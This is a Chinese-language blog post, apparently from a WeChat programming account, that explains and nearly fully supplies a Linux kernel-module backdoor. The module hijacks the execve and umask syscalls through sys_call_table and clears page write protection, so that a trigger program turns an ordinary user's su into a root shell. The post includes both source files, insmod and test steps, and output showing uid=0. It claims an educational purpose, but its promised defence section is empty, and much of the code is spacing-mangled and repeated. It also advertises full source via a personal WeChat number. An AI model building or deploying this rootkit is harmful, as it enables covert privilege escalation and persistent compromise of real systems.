在Linux系统中,root是拥有最高管理权限的超级用户,普通进程默认只能受限运行。本文将带你用最通俗的语言,拆解一个通过劫持内核系统调用,让普通用户程序瞬间获取root权限的内核级后门实现。这不是攻击教程,而是带你理解Linux权限机制、内核工作原理的技术剖析,所有内容仅用于学习和系统安全防护。
一、核心概念:这到底是什么?
简单说,这是一个Linux内核模块(LKM) + 普通用户程序 配合实现的权限提升后门:
- 内核模块:运行在内核空间,拥有操作系统最高权限,能修改内核核心数据;
- 用户程序:运行在普通权限下,作为触发后门的“开关”;
- 核心效果:普通用户运行这个小程序后,无需输入密码,直接获得root超级权限。
它的本质不是破解密码,而是欺骗内核,偷偷修改进程的权限凭证。
二、必备基础知识点
想读懂代码,先搞懂这4个核心知识点,不用记复杂术语:
1. 内核空间 vs 用户空间
- 用户空间:我们平时用的QQ、浏览器、命令行都在这里,权限极低,不能碰系统核心;
- 内核空间:操作系统的“大脑”,管理硬件、进程、权限,只有内核代码能在这里运行,权限无敌。 这个后门就是把代码塞进内核空间,才能篡改权限。
2. 系统调用(Syscall)
用户程序想让内核干活,必须走系统调用,比如:
内核里有一张系统调用表,记录了所有系统调用的函数地址,这是后门的核心攻击目标。
3. 进程凭证(Cred)
Linux给每个进程发了一张“身份证”,叫cred结构体,里面记录了:
- 有效EUID(你能以谁的身份运行)把UID和EUID改成0,进程就是root! 这是后门的核心目的。
4. 内核模块
Linux允许动态加载内核代码,不用重启系统,这就是.ko文件。后门就是靠这个特性,悄无声息注入内核。
三、整体设计思路:两步配合,完成提权
整个后门分为内核端(提权核心) 和用户端(触发开关),分工明确:
整体流程原理图
普通用户程序(rootswitch)
↓ 执行 umask 命令(触发内核钩子)
内核模块:劫持 umask 系统调用 → 激活提权开关
↓ 执行 su 命令(触发execve调用)
内核模块:劫持 execve 系统调用 → 篡改进程凭证为root
↓ su 进程获得最高权限
普通用户 → 秒变root
设计核心逻辑
- 不破坏原功能:劫持系统调用后,必须执行原来的系统调用,不被系统发现;
- 精准触发:只有我们的用户程序能触发提权,其他程序正常运行;
- 内核隐身操作:修改系统调用表权限,完成劫持后恢复保护,隐藏痕迹。
四、代码逐段拆解
...
asmlinkage intmal_execve(constchar *filename, constchar *const argv[], constchar *const envp[])
{
if (ref == 1){
printk(KERN_INFO "[+] Giving r00t!");
structcred *np;
kuid_t nuid;
nuid.val = 0;
np = prepare_creds();
np->uid = nuid;
np->euid = nuid;
commit_creds(np);
}
return origin_execvecall(filename,argv,envp);
}
asmlinkage int(*origin_umaskcall)(mode_t mask);
asmlinkage intmal_umask(mode_t mask){
if (ref == 0){
ref = 1;
} else{
ref = 0;
}
return origin_umaskcall(mask);
}
voidset_sct_addr(void)
{
sct_address = (void*)kallsyms_lookup_name("sys_call_table");
}
intsct_w(unsignedlong sct_addr)
{
unsignedint level;
pte_t *pte = lookup_address(sct_addr,&level);
if (pte->pte &~_PAGE_RW)
{
pte->pte |=_PAGE_RW;
}
return0;
}
intsct_xw(unsignedlong sct_addr)
{
unsignedint level;
pte_t *pte = lookup_address(sct_addr, &level);
pte->pte = pte->pte &~_PAGE_RW;
return0;
}
staticint __init hload(void)
{
set_sct_addr();
...
sct_w((unsignedlong)sct_address);
sct_address[__NR_execve] = mal_execve;
sct_address[__NR_umask] = mal_umask;
sct_xw((unsignedlong)sct_address);
printk(KERN_INFO "[?] SCT: [0x%llx]\n[?] EXECVE: [0x%llx]\n[?] UMASK: [0x%llx]",sct_address,sct_address[__NR_execve],sct_address[__NR_umask]);
return0;
}
staticvoid __exit hunload(void)
{
sct_w((unsignedlong )sct_address);
sct_address[__NR_execve] = origin_execvecall;
sct_address[__NR_umask] = origin_umaskcall;
sct_xw((unsignedlong)sct_address);
}
module_init(hload);
module_exit(hunload);
...
If you need the complete source code, please add the WeChat number (c17865354792)
我们把代码分成用户端开关和内核端后门两部分讲解。
第一部分:用户端程序
这是一个极简的C程序,名字可以叫rs.c,作用就是按顺序触发两个内核钩子:
#include<stdlib.h>
#include<stdio.h>
intmain()
{
// 第一次执行umask → 激活内核里的提权开关
system("umask 22");
printf("[!] 开关已触发!\n");
// 执行su命令 → 触发内核提权
system("su");
// 第二次执行umask → 关闭提权开关
system("umask 22");
return0;
}
作用:纯“工具人”程序,负责给内核模块发信号,不做任何提权操作。
第二部分:内核模块(提权核心)
这是后门的灵魂,一共做4件事:找系统调用表→修改表权限→劫持两个系统调用→恢复保护。
1. 全局变量:定义“开关”和关键地址
// 提权开关:0=关闭 1=激活
int ref = 0;
// 系统调用表地址(内核核心表格)
void **sct_address;
// 保存原来的execve和umask函数地址
asmlinkage int(*origin_execvecall)();
asmlinkage int(*origin_umaskcall)();
作用:记录关键数据,防止劫持后找不到原函数。
2. 劫持umask调用:控制提权开关
// 伪造的umask函数
asmlinkage intmal_umask(mode_t mask){
// 切换开关状态:0变1,1变0
ref = !ref;
// 执行原来的umask功能,不影响系统
return origin_umaskcall(mask);
}
原理:用户程序执行umask时,内核不执行原函数,先执行我们的代码,翻转提权开关。
3. 劫持execve调用:核心提权逻辑
// 伪造的execve函数(运行程序时触发)
asmlinkage intmal_execve(constchar *filename, constchar *const argv[], constchar *const envp[])
{
// 如果开关激活(ref=1)
if (ref == 1){
// 新建一张权限身份证
structcred *np = prepare_creds();
// 把UID设为0(root)
kuid_t nuid = {0};
np->uid = nuid;
np->euid = nuid;
// 把新身份证绑定到当前进程
commit_creds(np);
}
// 执行原来的execve,正常运行程序
return origin_execvecall(filename,argv,envp);
}
核心:当开关打开,运行su程序时,内核偷偷把这个进程的权限改成root,再正常运行。
4. 修改系统调用表权限
系统调用表默认是只读保护的,不能修改,所以需要:
// 取消保护,改为可写
intsct_w(unsignedlong sct_addr){
pte_t *pte = lookup_address(sct_addr,&level);
pte->pte |= _PAGE_RW; // 加写权限
}
// 恢复只读保护
intsct_xw(unsignedlong sct_addr){
pte_t *pte = lookup_address(sct_addr,&level);
pte->pte &= ~_PAGE_RW; // 去掉写权限
}
5. 模块加载/卸载:完成劫持
// 加载模块:劫持系统调用
staticint __init hload(void){
set_sct_addr(); // 找到系统调用表
sct_w(); // 取消保护
// 替换表中的函数:原函数→我们的伪造函数
sct_address[__NR_execve] = mal_execve;
sct_address[__NR_umask] = mal_umask;
sct_xw(); // 恢复保护
}
// 卸载模块:恢复原系统调用
staticvoid __exit hunload(void){
sct_w();
// 把原函数放回表格
sct_address[__NR_execve] = origin_execvecall;
sct_address[__NR_umask] = origin_umaskcall;
sct_xw();
}
五、完整执行流程
我们把整个过程串起来,你就能完全看懂:
- 编译加载:编译内核模块,用root权限加载进内核;
- 第一步触发:程序执行
umask→内核劫持→ref=1(提权开关打开); - 权限篡改:内核给
su进程创建root凭证,UID=0; - 获得权限:
su进程以root身份运行,命令行直接变成root权限; - 关闭开关:退出root后,程序再次执行
umask→ref=0,开关关闭。
六、知识要点总结
1. 涉及的技术领域
- Linux内核编程:内核模块开发、系统调用表操作;
- Linux权限机制:进程凭证(cred)、UID/EUID权限模型;
2. 设计亮点
3. 安全防护启示
这个后门也告诉我们如何防护这类攻击:
七、测试运行这个权限提升内核后门的完整步骤
加载内核模块
sudo insmod rootkit.ko
没有报错 = 加载成功
查看内核日志是否生效(可选):
dmesg
你会看到类似:
[?] SCT: [0xffffffffxxxxxxx]
[?] EXECVE: [0xffffffffxxxxxxx]
[?] UMASK: [0xffffffffxxxxxxx]
测试提权
直接运行开关程序:
./rs
你会看到效果:
[!] Switch hit!
#
# 代表你已经 变成 root 用户!
验证权限:
id
输出:
uid=0(root) gid=0(root) groups=0(root)
✅ 提权成功!
退出 root:
exit
卸载模块
sudo rmmod rootkit
总结
这个示例内核后门,本质是利用Linux内核的开放性,劫持系统调用篡改进程权限。它没有复杂的加密和隐藏,却完美诠释了Linux权限机制的核心和内核级攻击的基本原理。
学习它的目的,不是为了攻击,而是真正理解Linux内核的工作方式,从而更好地保护我们的系统安全。
Welcome to follow WeChat official account【程序猿编码】